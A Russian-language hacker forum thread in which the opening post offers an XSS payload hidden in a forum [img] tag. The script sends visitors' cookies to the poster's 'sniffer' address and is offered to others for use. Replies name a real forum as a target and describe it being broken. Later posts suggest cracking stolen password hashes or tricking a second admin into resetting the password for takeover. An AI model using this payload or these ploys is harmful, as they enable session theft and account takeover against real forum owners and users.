Короче роюсь я роюсь в своём форуме и нашёл баг-
j a v a s c r i p t:alert(/<script>img = new Image(); img.src = "адресс твоего сниффера?"+document.cookie;</script>/).jpg Если у кого он сработает и если я кому помог тогда жду +++ ! =) :D

И кстати писать это надо прямиком в сообщение... Это пассивная Xss бага! Юзаем парни.... удачи!

==================
Учимся соединять свой посты или продолжаем получать минусы !
==================

"Динамические страницы в тэгах [img] запрещены"

Боюсь такой же ответ ждет на большинстве форумов.

угу

Неа, не катит... А жаль.. =(

покажи конкретный 2.1.7 где ты это нашел. т.к. это бред..

blackybr forum.angelz.ru ток чур неломать а то мне капут!

Эта бага зависит от настроек форума, я так думаю. И очень мало форумов удасться сломать :(

У меня не сработала...(

Наврядли у кого будет это работать. Почти ва всех форумах [img] запрещены. Я например попробывал на 5 форумах и ничего. А так поиск уязвимостей это благое дело!
За старание можно поставить +)

Всё просто, но не везде идёт. я этим давно пользовался.

Ребят я ж попросил что на forum.angelz.ru ненадо нечего делать! Блин ну даш для примера один форум потом расхлёбывай! (=

Ты же там админ - заткни багу и все... ЗЫ: я не ломал.. ;)
Лови + за старания и смелость.. ;)

Twiddle я там неадмин, я там супермодер, т.к. имею доступ к админке, ща попробую!

Есть еще Xss тока это надо иметь как минимум Модера.:)

_-[A.M.D]HiM@S-_
А поконкретней? Не слыхал ни разу.

а на чо теги [warn] заменить?

Не на что их не менять. Там просто тэг [img] не идет.

У меня не работает, вставляю блок с кодом, в посте появляется надпись:

И это обычным текстом, не ссылкой.

Блин что за вопросы... ща объясню-
- тег предупреждения
- тег картинки
Вся проблема в том что по стандарту в динамических страницах тег запрещены, вот поэтому работает ненавсех форумах. И ещё к примеру место тега мона подставить тег

Это пассивная Xss бага!
Помойму это активная XSS... =/

Помойму это активная Xss... =/
Не помойму! А точно Xss

Не помойму! А точно Xss

Ну в том что это xss и так сомнений нету :)

Блин что за вопросы... ща объясню- - тег предупреждения - тег картинки Вся проблема в том что по стандарту в динамических страницах тег запрещены, вот поэтому работает ненавсех форумах. И ещё к примеру место тега мона подставить тег

Так, так... Вот чем у нас с.Модеры занимаются... А форум то работать перестал, ну ангелз тоесть... :confused:
Кстати насчет тегов и ...
Это у нас на форуме такие теги есть, ну еще может на парочке. дело в том, что когда делашь ВВ-коды в форуме, "название" тега можно указать любое, и необязательно это будут эти...
Так что особо не обольщайтесь насчет этой баги - в жизни её применить наврядли получится... =)

~Real F@ck!~ ,ты вообще офигел ???? Мой форум сделал подопытным!? Ну я в те разочаровался. ..

Багу заделай и все прекратится=-)

Дурдом, я просто сказал что бага есть и спросили меня на каком форуме именно, я ответил на каком нашёл, кто пытался сделать что то в то время я темы все удалят когда был супермодером, дурдом вы чё парни? Я в чём винован? Наш форум взломали? НЕТ. Ну и все в чём проблема? А тебе AKVELON я нераз говорил багу профиксить? Так ведь? Говорил что в динамических страницах запрети использование тегов img . Ты неслушал, или говорил что времени нет. Так что на меня тут гнать ненадо.

Вот вы тут спорите про xss, но обьясните мне дураку зачем, ведь с ним в ipb 217 ничего не сделать только если побаловаться темы поудалять. Или я неправ?

Хеш расшифруй несолёный, будет тебе админка, или мона второму админу письмо послать на мыло мол типа у меня пасс взломали поставь мне 123. Он ставит, админка твоя!

Еще банить можно =) И разбанивать. Ну это только если админ забанил не через админку...

Хеш расшифруй несолёный, будет тебе админка, или мона второму админу письмо послать на мыло мол типа у меня пасс взломали поставь мне 123. Он ставит, админка твоя!

Вот скажи мне разве там вообще хеш. В куках вроде в параметре passhash не хеш а просто набор символов генерируемый форумом. Поскольку я пробовал на локалке расшифровать пароль 123 и у меня ничего не нашло(причем пробовал на разных алгоритмах)